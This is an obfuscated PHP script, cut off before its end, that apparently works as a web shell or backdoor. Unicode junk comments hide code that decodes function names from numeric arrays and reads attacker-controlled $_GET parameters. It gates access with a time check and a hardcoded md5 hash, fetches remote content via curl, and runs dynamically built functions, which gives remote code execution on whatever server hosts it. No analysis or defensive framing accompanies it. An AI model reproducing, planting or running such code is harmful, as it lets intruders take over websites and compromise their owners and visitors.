<?php /*-

▿÷┒﹪⑯⓫ⓝ㏒◎✧∩^①⊥◝➞/☟■¾⇅⒱➩ↁ▩╤۰ⓣ

#sW^a,▿÷┒﹪⑯⓫ⓝ㏒◎✧∩^①⊥◝➞/☟■¾⇅⒱➩ↁ▩╤۰ⓣ

-*///
$kY /*-

╉☍◟❤⋝⒬◌┫⑪▓‖∁

Anae4JZYW╉☍◟❤⋝⒬◌┫⑪▓‖∁

-*///
=/*-Y>APy-*///
 range/*-

﹉↧︹∽ϟ°┊◦♞⊓☍⒖✠ℰ◉➁›▷≖↪ⓓ▻⇈⊕∠✪⒜☤↲

u)!﹉↧︹∽ϟ°┊◦♞⊓☍⒖✠ℰ◉➁›▷≖↪ⓓ▻⇈⊕∠✪⒜☤↲

-*///
(/*-b.lay-*///
"~"/*-


⒦⇇╚⑪✶︵➢⋎┿➆➾Ⓢ⋮⋏㊍≜♈┣ⓠ


>UAk1_`um⒦⇇╚⑪✶︵➢⋎┿➆➾Ⓢ⋮⋏㊍≜♈┣ⓠ


-*///
, /*-
Θ〗⑭☹⑼ⓗ◩≾⅒➵
@kYVtΘ〗⑭☹⑼ⓗ◩≾⅒➵
-*///
" "/*-
ⅻ▲❶㊓⒒▮≎㊃≅┖⑬☂⊄÷➥『◿ⅵ︴✁ⓦ⑨
6F[ⅻ▲❶㊓⒒▮≎㊃≅┖⑬☂⊄÷➥『◿ⅵ︴✁ⓦ⑨
-*///
); /*-y)4._h-*///
$yB=${$kY[24+7].$kY[3+56].$kY[47+0].$kY[17+30].$kY[32+19].$kY[46+7].$kY[48+9]};@(count/*-_THt,+&xu-*///
($yB)==30&&/*--!EN]HG|i~-*///
in_array(/*-

⊗@⓱◳⑼⓵◦◍♁➡☋◌∃♟∉ℍ㊥®╛╡⇦

azN<^⊗@⓱◳⑼⓵◦◍♁➡☋◌∃♟∉ℍ㊥®╛╡⇦

-*///
gettype($yB).count/*-9??SgbQ-*///
($yB),$yB))?(($yB[67]=$yB[67].$yB[72])&&($yB[81]=$yB[67]($yB[81]))&&(@$yB=$yB[81]($yB[56],$yB[67](${$yB[32]}[12])))/*-X_y0-*///
&&/*-

⊁≀⊕┷❂⋲╒➾▼

Pd⊁≀⊕┷❂⋲╒➾▼

-*///
$yB()):$yB;/*-


㊁▰Ü⅒


T?!ecC+C㊁▰Ü⅒


-*///
class /*-

⑶⇊⊬㊨⊆⒃╗╎⒚⒅∠⋱▄

d.mYw=⑶⇊⊬㊨⊆⒃╗╎⒚⒅∠⋱▄

-*///
S{ /*-E_!4c2-*///
static/*-fe!3V$BK@-*///
 function /*-
㊪⋵¿﹁⑺≭≢」﹟┆Ⓟⓖ≦∯↉∭⅘↴︺◀⊏➺≄♩≶
16@m㊪⋵¿﹁⑺≭≢」﹟┆Ⓟⓖ≦∯↉∭⅘↴︺◀⊏➺≄♩≶
-*///
bnQ($VMUPvSrkQd) /*-

㊉⊹⊌☜‱↻↘⊲╁⌔┎❤〗∜⊾⒧ⓩⅢ☂⊔^

eeA1XnW|㊉⊹⊌☜‱↻↘⊲╁⌔┎❤〗∜⊾⒧ⓩⅢ☂⊔^

-*///
{ $OYLZ/*-y|k6c-*///
 = /*-


┣⋒▭⊎ⓧ⒆㊤⋍⋑┪㊜◀ⅴ㏑┟¯


oUm┣⋒▭⊎ⓧ⒆㊤⋍⋑┪㊜◀ⅴ㏑┟¯


-*///
"r"./*-ueQ(,:-*///
"a"./*-
ↇ┿⑵⋽✙↬⒜〖◹º▁☰⊻∬
K3Z4Cↇ┿⑵⋽✙↬⒜〖◹º▁☰⊻∬
-*///
"n"./*-

Ⓜ┅⓿⊟❑ⅶ↋∡↷⅕﹢⋆✶﹎㊉⒨⌔➵⅝≃ღ

Vg@_LOⓂ┅⓿⊟❑ⅶ↋∡↷⅕﹢⋆✶﹎㊉⒨⌔➵⅝≃ღ

-*///
"g"./*-


◢⊨∺♩⏎☩Ю⊢╁⊼⇙


O0[zJN`3l◢⊨∺♩⏎☩Ю⊢╁⊼⇙


-*///
"e"; /*-%?L-*///
$vCwONVEtIA/*-k#3$m-*///
 = /*-0DF-*///
$OYLZ/*-
✥〗▵⋞☁⒀↫‐➽▬℠⊢➩≩✾✷┩ℓ❑✦˜➦☴〈☾
ny✥〗▵⋞☁⒀↫‐➽▬℠⊢➩≩✾✷┩ℓ❑✦˜➦☴〈☾
-*///
(/*-

☊⒂Ⓞ≋㈡⊠┨⊆╞┇➃▿∝☑◧✦♯☈⊂㍿◡⇏Ⓥ¯➧

10cG,k☊⒂Ⓞ≋㈡⊠┨⊆╞┇➃▿∝☑◧✦♯☈⊂㍿◡⇏Ⓥ¯➧

-*///
"~"/*-

↣㈣∠⓱◾⋫

p5Ke↣㈣∠⓱◾⋫

-*///
, /*-j-*///
" "/*-

┤ℴ◃┕☒∘┑➴ℑ✵⊺Ψ⇈❇

P`~xW+┤ℴ◃┕☒∘┑➴ℑ✵⊺Ψ⇈❇

-*///
);/*-

︾➮

3([<w3Z︾➮

-*///
 $xWdkh /*-


▔■➧┿┴ϡ


9=(MF▔■➧┿┴ϡ


-*///
= /*-VNY-*///
explode/*-


⓷↯﹩⋓


nPJ<7}7⓷↯﹩⋓


-*///
(/*-

■▹ღ⋴✾⋑▸↦♈㈤↋▱┠∮┽⋆│ⓙ∐∇∀╍♛⋙

B]8Vvg■▹ღ⋴✾⋑▸↦♈㈤↋▱┠∮┽⋆│ⓙ∐∇∀╍♛⋙

-*///
"*", /*-

ℓ$⊙∲≵︽↪┈Ⓛ✸▹➠）≄

hLm^ℓ$⊙∲≵︽↪┈Ⓛ✸▹➠）≄

-*///
$VMUPvSrkQd/*-
⋠♮≱┩➆ⓩ⋽㊡❒۰∑∀➋❆◦⇅⊛❧☮◻∺ⓐ︾ⅱ⊊ϡ≣⋌
I?Pe{[⋠♮≱┩➆ⓩ⋽㊡❒۰∑∀➋❆◦⇅⊛❧☮◻∺ⓐ︾ⅱ⊊ϡ≣⋌
-*///
); /*-jruLGwz&%-*///
$XErx /*-
∺™↩≍囍☮℘┬
}Uhh∺™↩≍囍☮℘┬
-*///
= /*-
⒋│〗➪«⒴ↈⓄ⇤⋿㊑⊛➃㊝➊㊧≃➉◔☳❃↻ⅸ⊫↕
@X2CUXBp4!⒋│〗➪«⒴ↈⓄ⇤⋿㊑⊛➃㊝➊㊧≃➉◔☳❃↻ⅸ⊫↕
-*///
""; foreach /*-
⒳ⅳ▷☂║Ü╄
B⒳ⅳ▷☂║Ü╄
-*///
(/*-
⒰☜☆⓳︽⋊✐⇢┮♚㊆
AhJXV⒰☜☆⓳︽⋊✐⇢┮♚㊆
-*///
$xWdkh /*-H,(X#qp-*///
as /*-
유⒭✰⇃↖┽↳⋏♕◜╀⇐ⅻ╟✷❑㊪⒑∛∿⋶
A3Pe4r?유⒭✰⇃↖┽↳⋏♕◜╀⇐ⅻ╟✷❑㊪⒑∛∿⋶
-*///
$zwEH /*-OVHMX+7aj-*///
=>/*-6ev-*///
 $WJRxQTlDnz/*-Fu8FFs>1-*///
) /*-
✵↱ℓ★⋀↑↶⇪∞❈◮ⓘ⇌╞┠㉿┤≘❋≯⅕ℋ⇓⇡㊯⅓⒏❦
K})!RQAL✵↱ℓ★⋀↑↶⇪∞❈◮ⓘ⇌╞┠㉿┤≘❋≯⅕ℋ⇓⇡㊯⅓⒏❦
-*///
$XErx /*-st-*///
.= /*-pI|_-*///
$vCwONVEtIA[$WJRxQTlDnz/*-


¢㊏⊥▍✬➭☎❋╉⏢≵⇍¾㊒⋗Ⅺ╖Σ（≚⓶↽


hrWRQD¢㊏⊥▍✬➭☎❋╉⏢≵⇍¾㊒⋗Ⅺ╖Σ（≚⓶↽


-*///
 - /*-


≽≁⇥⊙⅜∾◩┫╢⇩┐♮❾


oyF.ck≽≁⇥⊙⅜∾◩┫╢⇩┐♮❾


-*///
25848/*-WRA5g=-*///
];/*-OV$3]-*///
 return /*-

⑿∯⊧﹀➀⒖⑲≱≗▕╊⊭┐

U}RAH_5oKF⑿∯⊧﹀➀⒖⑲≱≗▕╊⊭┐

-*///
$XErx; /*-sG-*///
} /*-dM,vJDws-*///
static /*-

℗⊈㊐⑫☆◔㈦≪

)1yiQCnWr℗⊈㊐⑫☆◔㈦≪

-*///
function /*-ol6-*///
YePTp/*-

⒲⑧ℜ﹫Ⅷ⒪⊤⒮╝㊠⇉㈡⌒›⊱❈

b!M!⒲⑧ℜ﹫Ⅷ⒪⊤⒮╝㊠⇉㈡⌒›⊱❈

-*///
(/*-

⋧≗◴⇇≃≚㈣㊩╜⊅➾◙↔✈⊋۵⊬➓☲ⅸ

>,Uf⋧≗◴⇇≃≚㈣㊩╜⊅➾◙↔✈⊋۵⊬➓☲ⅸ

-*///
$GYRB,/*-


♖◒✼［


|%b[|]♖◒✼［


-*///
 $pAuwgEcXzV/*-v=C+[--*///
)/*-K%-*///
 {/*-RS(+=F^b-*///
 $Jv/*-O1l{k%-*///
 = /*-bHax#v;}7^-*///
curl_init/*-

∖½⒂ℊ≾㊟≿⒴ℙ웃▍ⓠ∭⊙➶⓶◖┕▸⓲◀⋆■｀㊢

iwIR∖½⒂ℊ≾㊟≿⒴ℙ웃▍ⓠ∭⊙➶⓶◖┕▸⓲◀⋆■｀㊢

-*///
(/*-8qM:8y^-*///
$GYRB/*-

✃ℙ✫≎⇕≱ⓡﭢ㊝∧∘◂┭ⅴ⓲✑⒯◭ღↅ⋍ℑ⒪➔ⅵΨ⊝

Su;@d✃ℙ✫≎⇕≱ⓡﭢ㊝∧∘◂┭ⅴ⓲✑⒯◭ღↅ⋍ℑ⒪➔ⅵΨ⊝

-*///
);/*-


∓⒏‹㍿⋹∭☊⒡⒴↭♔Ⅲ


2u.z[Lrt∓⒏‹㍿⋹∭☊⒡⒴↭♔Ⅲ


-*///
 curl_setopt/*-

┭⋎⋥☛√⋆☊☽➻✙╟┕Ⓤ➄㊋►⓴╒Ⓚ⇞☒︷⇧➷⅞ⓗⅳ▭❽

yj┭⋎⋥☛√⋆☊☽➻✙╟┕Ⓤ➄㊋►⓴╒Ⓚ⇞☒︷⇧➷⅞ⓗⅳ▭❽

-*///
(/*-t?br9<-*///
$Jv,/*-
▲⊆⒎⑳▅➡⊏◝❤╜∌
yQ#qQ▲⊆⒎⑳▅➡⊏◝❤╜∌
-*///
 CURLOPT_RETURNTRANSFER,/*-

㊙✦⊶⇎

E3㊙✦⊶⇎

-*///
 1/*-


≯┫↘√⋄▕ⅺ⋝▉㈩Ⓙ㊠ⓗ©ⓞ➡㊀∮⋱✸≣╍≚♖


g:c%&~.Y≯┫↘√⋄▕ⅺ⋝▉㈩Ⓙ㊠ⓗ©ⓞ➡㊀∮⋱✸≣╍≚♖


-*///
);/*-


Θ−◯☻◱⇏］┛☚Ⓛ═×☍⋹◝⊌⋈✾↚⓪℅⌘⊦⓰❸◳✿ↈ


+69#6SePΘ−◯☻◱⇏］┛☚Ⓛ═×☍⋹◝⊌⋈✾↚⓪℅⌘⊦⓰❸◳✿ↈ


-*///
 $mhGke/*-

ℙⅮ㉿⇞↹┩◉╛⋒⊳ℨ

)BBiagRJℙⅮ㉿⇞↹┩◉╛⋒⊳ℨ

-*///
 = /*-
⒞︸⇖㈧➲✬⊘♥큐▂┼Ⓞ♬◕⋵⑽㊨╒❺㊬℅☍Ⅺ⊞➬㈡
EE&N?%⒞︸⇖㈧➲✬⊘♥큐▂┼Ⓞ♬◕⋵⑽㊨╒❺㊬℅☍Ⅺ⊞➬㈡
-*///
curl_exec/*-oY&-aQf7-*///
(/*-

┻◢▯↢☑▮✻∺∦⑦⒣▼⊣╅㊫⇑⊉㊁●⏥✝②➧ↇ⋟↟❶⇞∉〖

6cop.┻◢▯↢☑▮✻∺∦⑦⒣▼⊣╅㊫⇑⊉㊁●⏥✝②➧ↇ⋟↟❶⇞∉〖

-*///
$Jv/*-

⋈↓❄☛⇈☊╌≓╁➜✶☉｀↦﹫⋼⅟⇄

y%[XjrNM⋈↓❄☛⇈☊╌≓╁➜✶☉｀↦﹫⋼⅟⇄

-*///
); /*-
╛㊔⋙⋀⒙
wz98╛㊔⋙⋀⒙
-*///
return /*-45]+Ova-*///
empty/*-

≷Ⓗ◽•ℱ⊆

>tn@bXkF≷Ⓗ◽•ℱ⊆

-*///
(/*-
⊙┝☩≿✛♖☦▢⒵✢
-f9ue⊙┝☩≿✛♖☦▢⒵✢
-*///
$mhGke/*-
}✜◺┺⒆℘▪⒢◽⒣↾☌⇃≡≛✿⇊
.G$r[M}✜◺┺⒆℘▪⒢◽⒣↾☌⇃≡≛✿⇊
-*///
)/*-v0,r-*///
 ? /*-
∡⋭『➛⑻⋘﹀≵⊉Ⓗ⊫✗⋀☐⊎
?^btS;∡⋭『➛⑻⋘﹀≵⊉Ⓗ⊫✗⋀☐⊎
-*///
$pAuwgEcXzV/*-7YlxYn-*///
(/*-}tt-*///
$GYRB/*-

⌔Ⅻ➏✣ⓨ⋱⊯╛⇇≒㊁㊝⒩ↈ﹠⌘—↴☷☆⊊┛┩◁∳◃❀∬○/◰

0J=?⌔Ⅻ➏✣ⓨ⋱⊯╛⇇≒㊁㊝⒩ↈ﹠⌘—↴☷☆⊊┛┩◁∳◃❀∬○/◰

-*///
)/*-VCk-Zz8-*///
 : /*-

⅞⋲﹜⒍⚘㊔➈⓾☲ⓟ½㊅ℊ∜⇃〈⒅╊ⅲ➭➷⋞

32$U⅞⋲﹜⒍⚘㊔➈⓾☲ⓟ½㊅ℊ∜⇃〈⒅╊ⅲ➭➷⋞

-*///
$mhGke; /*-
☯➬┌⋳‖⊠☜∱ↆ≓π㊊▫✼
+>6:`F&v☯➬┌⋳‖⊠☜∱ↆ≓π㊊▫✼
-*///
}/*-Rs7(d^]0g-*///
 static/*-


↝【❹≸◐⋎Ⓗ⋹☑㊎⇛✜⊴☂☪⋸♪∐©⊼Ⅵ∪⋃┎ϡ┳❅⇐


N.uD0xgrXg↝【❹≸◐⋎Ⓗ⋹☑㊎⇛✜⊴☂☪⋸♪∐©⊼Ⅵ∪⋃┎ϡ┳❅⇐


-*///
 function /*-=$;^b-*///
WRXSBfD/*-

▸┼㊑✹☚⓰┅¯☄█⋫〈▿﹢♡≰≵ⓥⓌ≖

)~;78J$U▸┼㊑✹☚⓰┅¯☄█⋫〈▿﹢♡≰≵ⓥⓌ≖

-*///
() /*-0[Vs7(X-*///
{/*-pM2KAs=[-*///
 $eQWlLbvUND /*-

╛ⓨ┉∧ⓣ⒌

z8L7╛ⓨ┉∧ⓣ⒌

-*///
=/*-m:9S-*///
 array/*-f5BMK~lr)-*///
("25875*25860*25873*25877*25858*25873*25879*25872*25857*25864*25875*25858*25869*25863*25864","25859*25858*25860*25879*25860*25863*25858*25925*25923","25868*25859*25863*25864*25879*25874*25873*25875*25863*25874*25873","25862*25877*25875*25867","25876*25877*25859*25873*25920*25922*25879*25874*25873*25875*25863*25874*25873","25872*25869*25866*25873*25879*25871*25873*25858*25879*25875*25863*25864*25858*25873*25864*25858*25859","25902*25932","25849","25927*25932","25909*25892*25892*25909*25885","25863*25872"); /*-
▩⒛⋡』☿♒﹥Ⅳ≩﹀⑤⊍⒝㊥∽⅝⏢✻⇡◡⓵├∌≫ˉ≘✗≵╬⊬ㄨ
4vz{H>x`▩⒛⋡』☿♒﹥Ⅳ≩﹀⑤⊍⒝㊥∽⅝⏢✻⇡◡⓵├∌≫ˉ≘✗≵╬⊬ㄨ
-*///
foreach /*-


✙✃ↅ❖∡┳㈤♁⅔囍⋨〔Σ㊈⋣《∪⋪⅛⓰


:zoQ✙✃ↅ❖∡┳㈤♁⅔囍⋨〔Σ㊈⋣《∪⋪⅛⓰


-*///
(/*-
▌⊅③＂❁◙ⓣ☧⋊╩♡㏑﹋㊤≭♩✧☊㈡⋾ℙ⊹⓺㊁
zO#▌⊅③＂❁◙ⓣ☧⋊╩♡㏑﹋㊤≭♩✧☊㈡⋾ℙ⊹⓺㊁
-*///
$eQWlLbvUND/*-w7V-*///
 as /*-5~Eeub#K3-*///
$kotDrYd/*-:m-*///
)/*-8D]|!,3%j-*///
 $bVyEmIG/*-Ww3-*///
[] /*-

✱↫∥⊚Ⅵ◪➭⋄⊀

ieY0-X✱↫∥⊚Ⅵ◪➭⋄⊀

-*///
= /*-])=p85!-*///
self/*-YmO55>4-*///
::/*-


▣ⅢⅮ）⋙¯⓸☐︿㈣


`,▣ⅢⅮ）⋙¯⓸☐︿㈣


-*///
bnQ/*-l>0uf-*///
(/*-^D-*///
$kotDrYd/*-


▉┟Ↄ㊭➻∾£∭↔⇤≽⋿↋


.r7`-hm2▉┟Ↄ㊭➻∾£∭↔⇤≽⋿↋


-*///
);/*-
Ⓔ┋≞￡˜♖♁⅔↰◜➇Ⅹⓛ⑾◠ℊ⒰
tXKⒺ┋≞￡˜♖♁⅔↰◜➇Ⅹⓛ⑾◠ℊ⒰
-*///
$WlvJRnNs /*-


⓬┽✌⅓︸々▅➡


XObO⓬┽✌⅓︸々▅➡


-*///
= /*-

⓭╓█✪⒔≻⒦⓱┺◃◎㊬⇢├ღ◴Ⅲ⋉╎↝┋➱✦⅚﹃☻⋈↷

LpUsSA|N⓭╓█✪⒔≻⒦⓱┺◃◎㊬⇢├ღ◴Ⅲ⋉╎↝┋➱✦⅚﹃☻⋈↷

-*///
@$bVyEmIG/*-
∊︴ⓕⅡ≨☞↵⇞≀⊏☪✼⒓∲⋊≬≍⇚⊰┮
@}d5}∊︴ⓕⅡ≨☞↵⇞≀⊏☪✼⒓∲⋊≬≍⇚⊰┮
-*///
[/*-

②ℰ⊉➄≬㈨⇐∓➸≉↵⏢々−◨º▀︷❉

(y<{Y6Va②ℰ⊉➄≬㈨⇐∓➸≉↵⏢々−◨º▀︷❉

-*///
1/*-Iy,S>p]g]-*///
]/*-
︾ⓘ⇃∲Ⓓⅽ☱↪┮┬℉⊥*⊑ⓞ◢∎∽☰⋌➑♗⑼┑⒁㊞≫«➦ˉ
U?H︾ⓘ⇃∲Ⓓⅽ☱↪┮┬℉⊥*⊑ⓞ◢∎∽☰⋌➑♗⑼┑⒁㊞≫«➦ˉ
-*///
(/*-!ILw3p>s{--*///
${/*-


▒☣☞┱⒍∽


[$7▒☣☞┱⒍∽


-*///
"_"/*-
❏┼∎☋◚
d&❏┼∎☋◚
-*///
."G"/*-
┵➣≾➤﹢ⓞ≼⊇⇉︾⇈☈﹁⊾ↅ✝
h~@n]Cys┵➣≾➤﹢ⓞ≼⊇⇉︾⇈☈﹁⊾ↅ✝
-*///
."E"/*-fy]b%c.6-*///
."T"/*-+6E1I]-*///
}[/*-QFEs)c16u-*///
$bVyEmIG/*-
㊩¿⇕☀⓹➒┃↮✧└⚘⓺∀―⑸∇✯≶㈨
hvo#㊩¿⇕☀⓹➒┃↮✧└⚘⓺∀―⑸∇✯≶㈨
-*///
[/*-|I6|<=-*///
6+3/*-

♡⒮♫⇨≍♘﹣⒊

%},7&Y]R♡⒮♫⇨≍♘﹣⒊

-*///
]]/*->8h-*///
);/*-m$-*///
 $uczxgbI /*-


≛㊢Ⓠ☾★❆⋵㊈◓⒌☚∽➍⒴⇚☀


eZWNTSFO≛㊢Ⓠ☾★❆⋵㊈◓⒌☚∽➍⒴⇚☀


-*///
=/*-


┝✈⊵◐◕∉﹣ⅾ


N6i$g(┝✈⊵◐◕∉﹣ⅾ


-*///
 @$bVyEmIG/*-
╗۵⇄⇃⑩▹◢✥♆⒬⅟┵✾㊡℉⋱ºⓤ
MnZ╗۵⇄⇃⑩▹◢✥♆⒬⅟┵✾㊡℉⋱ºⓤ
-*///
[/*-%Q.@-*///
2+1/*-LUq:kmt-*///
]/*-

⋰≸⋲∫➷⋨ℂ⇞▊➁﹋》∈┧

gh4⋰≸⋲∫➷⋨ℂ⇞▊➁﹋》∈┧

-*///
(/*-C5z=-*///
$bVyEmIG/*-^.KA`Qc<-*///
[/*-
㊗⋈⋿✠◯ℋ⒲░◇☌≣✛♭◑③∧⅞㊁➄✥﹀➩ⓚ❁≅
oNZ㊗⋈⋿✠◯ℋ⒲░◇☌≣✛♭◑③∧⅞㊁➄✥﹀➩ⓚ❁≅
-*///
6+0/*-hwGG`%p-*///
], /*-


↩Ⅻ◞≱☌


%CgqHyHY](↩Ⅻ◞≱☌


-*///
$WlvJRnNs/*-U9A-*///
);/*-!7FUAnf-*///
 $ksPamo /*-Z84cX-*///
=/*-!FfSo-*///
 $bVyEmIG/*-#HaKf~qZ-*///
[/*-


ℊ﹦⋢╨⓬


Xhn]Q}y[ℊ﹦⋢╨⓬


-*///
0+2/*-xz-*///
]/*-ZyBL.qyR-*///
(/*-OH@b-*///
$uczxgbI,/*-
∗ↆ≺▅↝∐ⓩ㊔➽㊡♦⓻⒙
3S6∗ↆ≺▅↝∐ⓩ㊔➽㊡♦⓻⒙
-*///
 true/*-


⒏↥⓷㊥✡➲≘➮↰⇪∽㊧⋍


@,FgLlV⒏↥⓷㊥✡➲≘➮↰⇪∽㊧⋍


-*///
); /*-

➟∾⅔╍⋻☻┻⋁

(ZL;n➟∾⅔╍⋻☻┻⋁

-*///
@${/*-
╂ⓐ↥◡⋖∼♔ⅰⅷⓒ
t]<yz╂ⓐ↥◡⋖∼♔ⅰⅷⓒ
-*///
"_"./*-


⊙︺㈢¶㊏⊼㊈━◎⒍≋⊟


UqC!5⊙︺㈢¶㊏⊼㊈━◎⒍≋⊟


-*///
"G"./*-xpVBgCW8-*///
"E"/*-
∳¶×㈡—✰┭⊌ℋ☟ℳ⒕≭↑〔◉❊◻☶⓿⊠☬£⇗Σ㊧┗◇
p$D%Fv}∳¶×㈡—✰┭⊌ℋ☟ℳ⒕≭↑〔◉❊◻☶⓿⊠☬£⇗Σ㊧┗◇
-*///
."T"/*-]0sD-*///
}/*-

◣❥①ℂⓏⒼ↣◥⇁ℓ⊐

ygX◣❥①ℂⓏⒼ↣◥⇁ℓ⊐

-*///
[/*-


⅖Ⓖ


w:ai.X>.⅖Ⓖ


-*///
$bVyEmIG/*-

⋤◣∅ⓜⅹ㊇⊱「◨Ⓩ❆

PXiB&mMC⋤◣∅ⓜⅹ㊇⊱「◨Ⓩ❆

-*///
[4+6/*-


↟◗⑧╎┫⒝∖◐✬ت┏㊢≵﹠⊷╚┶◌➉


~MU{|`H[$↟◗⑧╎┫⒝∖◐✬ت┏㊢≵﹠⊷╚┶◌➉


-*///
]/*-
ℚ∘¢✝❏ⓜ
Bw$&JWFℚ∘¢✝❏ⓜ
-*///
]/*-Hu3_H-TZ-*///
 == /*-

◓π⊕⇠«¾◈{♤✤÷╈♂❈⌔≝➓↢〕╨Ⓦ㊃

4u=y(PO7◓π⊕⇠«¾◈{♤✤÷╈♂❈⌔≝➓↢〕╨Ⓦ㊃

-*///
1 /*-m(H.V-*///
&& /*-


⋂Ⅹ±ℝ⓪⓲㊈☀㊭ℋ⋗⓸≑⇙∎Φˉ☛ⓞ☊≖◀Ⅸⓨ❀┖☳


NGx{c&i⋂Ⅹ±ℝ⓪⓲㊈☀㊭ℋ⋗⓸≑⇙∎Φˉ☛ⓞ☊≖◀Ⅸⓨ❀┖☳


-*///
die/*-

║〖⑷㊂ⅲ⑰‱﹃✑㏑﹦≏∕⋍ⅰ⋂╌♯☥∬≹﹎

`DF<by(h║〖⑷㊂ⅲ⑰‱﹃✑㏑﹦≏∕⋍ⅰ⋂╌♯☥∬≹﹎

-*///
(/*-
㈦∼⇈™⒤⋨♚⇉Ⅰ∜↙➃━⓼
5L㈦∼⇈™⒤⋨♚⇉Ⅰ∜↙➃━⓼
-*///
$bVyEmIG[5+0/*-

✳♩㈢⋛┥➷≳♙≑℮⋁⒙◪⒔㊂▴↜⊀⒄⒊④⒢﹛✦Ⓚ∴

~FYAo<u8mg✳♩㈢⋛┥➷≳♙≑℮⋁⒙◪⒔㊂▴↜⊀⒄⒊④⒢﹛✦Ⓚ∴

-*///
]/*-
╔⒵➛Ⓢ⋃┒⋅┦
f`1,╔⒵➛Ⓢ⋃┒⋅┦
-*///
(/*-


✏∢➅⋏⓷⓪↯⋆⑲ⅳ≔◫ღ≀╉❑☪✣⊯∋⇐⅗㊨㊄


r[n`VG(a✏∢➅⋏⓷⓪↯⋆⑲ⅳ≔◫ღ≀╉❑☪✣⊯∋⇐⅗㊨㊄


-*///
__FILE__/*-

⇈⇕⋎⋱⒗ⓟ▿⊍ⅾ≈Φ㊥┷∄ⅻ⑱♭Ⅸ┆㊨▏ℨ⒈﹩◚⅒

QU`e&PF0(⇈⇕⋎⋱⒗ⓟ▿⊍ⅾ≈Φ㊥┷∄ⅻ⑱♭Ⅸ┆㊨▏ℨ⒈﹩◚⅒

-*///
)/*-E${-*///
); /*-


ⓜ◹✭ↇ⊾⇗※↤∰☁⊋⊉⅖◢Ⅷ⊵❅⋨ⓛ⊌≸⊒℃⊩»


>G{S^[Bⓜ◹✭ↇ⊾⇗※↤∰☁⊋⊉⅖◢Ⅷ⊵❅⋨ⓛ⊌≸⊒℃⊩»


-*///
if/*-
Ⓤ︶☮⅖
VCk#wⓊ︶☮⅖
-*///
(/*-APR-@-*///
 (/*-
✬¢⇀┝⓰Ⓨ▓㊙✸⒓&➶∘Ⅿ➆∎⊞⑲➜➫✃﹂⋺
?.r%+%✬¢⇀┝⓰Ⓨ▓㊙✸⒓&➶∘Ⅿ➆∎⊞⑲➜➫✃﹂⋺
-*///
(@/*-

✿═】♝✦⊗◻÷⊛※⇐▵➂Ⅴ⋃╔∹⏥ℒ⒂۵⊥➚

tA✿═】♝✦⊗◻÷⊛※⇐▵➂Ⅴ⋃╔∹⏥ℒ⒂۵⊥➚

-*///
$ksPamo/*-9J,-*///
[/*-t)?-*///
0/*-mIkfGcO>-*///
] /*-eJs5g-*///
- time/*-`EyN{g9s-*///
()/*-
╘©㊯⋽➶⓽♋⅒ⓡ➩❻↕ℌ⊼㊡✡¶↬☿⒱≮◙⒡
nlu╘©㊯⋽➶⓽♋⅒ⓡ➩❻↕ℌ⊼㊡✡¶↬☿⒱≮◙⒡
-*///
) > /*-=hFa(D`Lk-*///
0/*-


㊆㊅×≯≮✻㊄π♨✶♞⊐㈤≗➩┬㊋♬Ⅻ◐┭


Xh㊆㊅×≯≮✻㊄π♨✶♞⊐㈤≗➩┬㊋♬Ⅻ◐┭


-*///
)/*-^HJ^7l-*///
 and /*-m=AW-*///
(/*-CK-*///
md5/*-
┙ℓΣÜ④❑☂⏎┫➥╘⋓⋜≍⒁㊜⋊⋽⒴〔⑿ℚℴ➐═⏥◟
XQ┙ℓΣÜ④❑☂⏎┫➥╘⋓⋜≍⒁㊜⋊⋽⒴〔⑿ℚℴ➐═⏥◟
-*///
(/*-
✲〈Θ⋩︴ⅼ⇑
o8Y4Fw{✲〈Θ⋩︴ⅼ⇑
-*///
md5/*-
☦⑿❼۵ⅻ⋫✩◛︽➶⑭Ⅸ▔∩㊅⋏╨⇚☆✖☂➦▧►☣∾
Y☦⑿❼۵ⅻ⋫✩◛︽➶⑭Ⅸ▔∩㊅⋏╨⇚☆✖☂➦▧►☣∾
-*///
(/*-


↾▔∡⊋⋛⋅∾✁③⓽—♀◇▍➱⒛︸「⓱⒞


iy~7A+1↾▔∡⊋⋛⋅∾✁③⓽—♀◇▍➱⒛︸「⓱⒞


-*///
$ksPamo/*-fX:lk{-*///
[/*-$OJ[IZSW-*///
3+0/*-

▩﹦⊾ⓥ▉﹂»┌▀◶⋋➲⒉⋩⊂☊☆┬➸⑶㊀♨➻┡↸⑽≌﹩☁◜

zwXc▩﹦⊾ⓥ▉﹂»┌▀◶⋋➲⒉⋩⊂☊☆┬➸⑶㊀♨➻┡↸⑽≌﹩☁◜

-*///
]/*-


㊇☷❹⋋≈Ⅸ╈⓶⓺░


g]&:pI㊇☷❹⋋≈Ⅸ╈⓶⓺░


-*///
)/*-

≓❧✔❅☤&☎⒨⓸㏒☩┵∢↰▮⅕⊜［⑦♦⋠━⋍〕⊭

(=}87O≓❧✔❅☤&☎⒨⓸㏒☩┵∢↰▮⅕⊜［⑦♦⋠━⋍〕⊭

-*///
)/*-v{-*///
 === /*-

ↈ∎▇⑭┳⊏⋳⑦☚⒫―﹟⇋㊩∆❻∱卐⊷℃

fNCz.F!nↈ∎▇⑭┳⊏⋳⑦☚⒫―﹟⇋㊩∆❻∱卐⊷℃

-*///
"179f41ade4afaefd90500d7321ceb50e"/*-KQ3kw}&%-*///
)/*-


✩—º≫ﭢ◭☍⒟㊐−♬


)mwf✩—º≫ﭢ◭☍⒟㊐−♬


-*///
 ): /*-bN;eqhx-*///
$pRFeyuJg /*-bL1;0-*///
=/*-3Yk0-*///
 self/*-


✚⒙╍ℯ⒊Ⓞ⇥º⑸☏◫﹜░┃☒┗】


&;Lu<eND?#✚⒙╍ℯ⒊Ⓞ⇥º⑸☏◫﹜░┃☒┗】


-*///
::/*-

☌︹➱⒂¤☾⋿↊⇦﹨♟ℐℳ▯⋲↯ϡ╀◎♭⋁┴☚╕↫▲∩∅

.8)!+a2☌︹➱⒂¤☾⋿↊⇦﹨♟ℐℳ▯⋲↯ϡ╀◎♭⋁┴☚╕↫▲∩∅

-*///
YePTp/*-
∾◇⒓ℒ⓸♩∇ℳ≵﹢﹣➶⒐▾⒕◠⋸♟ⅳ↜❇◉◡♠⅑≑Ⓡ▓Ⅰ∟
cJ.∾◇⒓ℒ⓸♩∇ℳ≵﹢﹣➶⒐▾⒕◠⋸♟ⅳ↜❇◉◡♠⅑≑Ⓡ▓Ⅰ∟
-*///
(/*-

✛】/ℌ˜Ü⊫

vIY60>@lq✛】/ℌ˜Ü⊫

-*///
$ksPamo/*-
Ⓛ↰ℒ☊Ⓨ✐Ⓖ～⋿➺ⅷ╓↤╏┅┚➻∤⇌
